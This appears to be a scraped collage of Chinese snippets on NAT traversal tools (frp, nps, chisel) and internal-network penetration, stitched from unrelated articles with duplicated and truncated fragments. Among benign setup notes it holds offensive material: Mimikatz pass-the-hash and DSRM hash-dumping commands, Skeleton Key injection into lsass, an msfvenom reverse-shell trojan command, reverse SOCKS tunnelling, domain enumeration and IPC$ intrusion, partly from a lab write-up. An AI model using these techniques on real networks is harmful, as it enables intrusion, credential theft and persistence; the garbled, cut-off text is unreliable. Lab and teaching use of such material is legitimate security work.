1、下载软件 wget https://github.com/ehang-io/nps/releases/download/v0.26.9/linux_amd64_server.tar.gz 2、解压软件 cd nps/ tar -zxvf linux_amd64_server.tar.gz 3、执行安装命令 对于linux|darwin sudo ./nps install 4、执行启动命令 对于linux|darwin sudo nps start 5、开放端口 8080、8024
方法: echo 1 > /proc/sys/net/ipv4/ip_forward sysctl -p firewall-cmd --permanent --add-port=161/tcp --zone=public firewall-cmd --permanent --add-port=161/udp --zone=public firewall-cmd --permanent --add-masquerade --zone=public firewall-cmd --permanent -
frp介绍 frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。 主要采用frp中的安全地暴露内网服务的步骤进行处理。 可以直接查阅文档,访问安全地暴露内网服务的文档 安装frp 首先需要在两台Centos7的系统上安装frp。 linux_amd64]# cat frps.ini [common] bind_port = 7000 [root@server01 frp_0.29.1_linux_amd64]# 安全地暴露内网 /frps -c frps.ini 在server01服务器,启动 frpc,转发内网的 redis 服务,配置如下,不需要指定远程端口: # vim frpc.ini [common] server_addr [7]> KEYS & (empty list or set) 127.0.0.1:6379[7]> KEYS * 1) "task_info_207" 2) ":1:django.contrib.sessions.cachewxv18olb5bzbckss3e9dndqy381ieiym
frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。 如果您用过类似花生壳的服务,对FRP这个名词可能不陌生,FRP可实现公网穿透到内网,即使您内网机器不支持公网IP也可以实现。不过花生壳之类的服务通常是限制流量或者需要额外付费,并且存在一定安全风险。 如果您自己有VPS也可以轻松搭建FRP,此处分享的是一个来自Github上的开源项目,这篇文章以CentOS 7 X64为例。 前提说明 FRP分服务端和客户端两部分组成,接下来我们这篇文章需要实现的目的就是穿透到内网来连接Windows PC,在开始之前先看下FRP结构图。 假如您服务器IP是1.1.1.1,当您连接1.1.1.1:3389时,就可以映射到内网的127.0.0.1:3389,从而实现内网穿透。
第一层网络(10.58.81.0/24) 1、VPN/Wi-Fi(10.58.81.108) 获取权限 目标单位的 VPN/Wi-Fi 存在弱口令漏洞,可以爆破出密码,获得目标单位内网的访问权限(备注: 撕开口子后,我们将以 Kali 的 10.58.81.108 为据点,对整个目标单位内网的所有资产进行横向渗透,期望能够获得目标单位中集权系统的控制权限。 搭建隧道 拿下 Web1 后,我们通过网卡信息发现内网里面除了第一层网络的 10.58.81.0/24 网段之外,还存在 192.168.52.0/24 网段,那么接下来我们就可以对该网段进行横向渗透。 系统本身存在 MS17-010 漏洞、Windows7 属于 WHOAMIANONY.ORG 域的成员。 靶场搭建 靶场下载 本次内网靶场使用 红日 7[8]。
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。 ? ? 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ? ?
在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 防火墙需要进行NAT 内网可以访问DMZ:此策略时用户可以使用或者管理DMZ中地服务器 外网不能访问内网:防火墙的基本策略,如需访问,通过V**的方式 外网可以访问DMZ:需要由防火墙来完成对外地址到服务器实际地址的转换 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ?
frp 的作用 利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。 利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。 将 frpc 及 frpc.ini 放到处于内网环境的机器上。 /frps.ini & 通过 ssh 访问内网机器 1.修改 frpc.ini 文件,假设 frps 所在服务器的公网 IP 为 x.x.x.x; 这里是指将内网的22端口映射到公网的6000端口上 # /frpc.ini & 3.上面是吧公网服务器的6000端口映射到内网服务器的22端口,这样就可以随时使用ssh连接内网服务器了。 ?
frp 的作用 1.利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。 3.利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。 将 frpc 及 frpc.ini 放到处于内网环境的机器上。 /frps.ini & 通过 ssh 访问内网机器 1.修改 frpc.ini 文件,假设 frps 所在服务器的公网 IP 为 x.x.x.x; 这里是指将内网的22端口映射到公网的6000端口上 /frpc.ini & 3.上面是吧公网服务器的6000端口映射到内网服务器的22端口,这样就可以随时使用ssh连接内网服务器了。
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。 链接地址:https://v.qq.com/x/page/a3231i4mxu7.html 如果腾讯视频访问出现异常或页面不存在等,可以访问国外Youtube 站点进行观看。
文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏 SAM文件中本地管理员的NTML Hash 在域控制器中打开Mimikatz,之后执行以下命令,可以得到DSRM账户的NTLM Hash为:41945356c1b2adde08c00d0e48515b7e privilege::debug sekurlsa::pth /domain:DC /user:administrator /ntlm:99b4cbb80c324c1601aae32c2f7925be Step 7: :hacke.testlab Step 7:修改用户密码——Kksvqm@123 Step 8:使用之前的证书依旧可以窃取的用户的NTLM Hash tgt::pac /subject:Al1ex /castore :current_user /domain:hacke.testlab 文末小结 本篇文章主要对内网渗透中的域内权限维持手法进行了介绍,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp
原理:当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个相同的 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。
1,为了将生产环境和开发区分开,方便开发,将利用DNS和Nginx代理做内网域名解析。 环境要求: 服务器:CentOS7 64位 IP:192.168.1.49 DNS Nginx1.1 客户端:CentOS7 64位 IP:192.168.1.45 ©著作权归作者所有:来自51CTO博客作者sqtce的原创作品,如需转载,请注明出处,否则将追究法律责任 CentOS7利用DNS和Nginx代理
domain 5.查看域内所有的主机名 net group "domain computers" /domain 6.查看域管理员 net group "domain admins" /domain 7. 即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见
0x02 chisel进行远程桌面代理 首先需要两台windows主机和一台VPS,在这里使用VPS作为chisel服务器端,然后使用win7作为内网主机,使用win10作为我们的攻击者主机。 (2):第二步:将win7的3389端口转发到VPS的33389端口 其实上一步已经完成了这一步操作,现在看一下chisel服务端和客户端的连接情况。 服务端 ? 客户端 ? (3):第三步:使用攻击者主机连接win7的3389 ? 成功登录远程桌面。 ,因为刚才说过,这个127.0.0.1的1080端口只能使用VPS这台主机访问内网的win7。 chisel客户端(win7的IP为192.168.223.151) chisel.exe client VPS:6666 R:socks ?
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知 一个是为了保障安全(内网与外网相隔绝),另一个就是资源共享,毕竟大家都是一条船上的人。SMB 协议就是用于实现各种资源的共享的,其中就包括IPC连接中的命名管道。 利用场景: 已拿下内网中一台主机的权限(webserver),掌握该主机的域用户名和密码,知道域内其他用户名。
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是... 前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。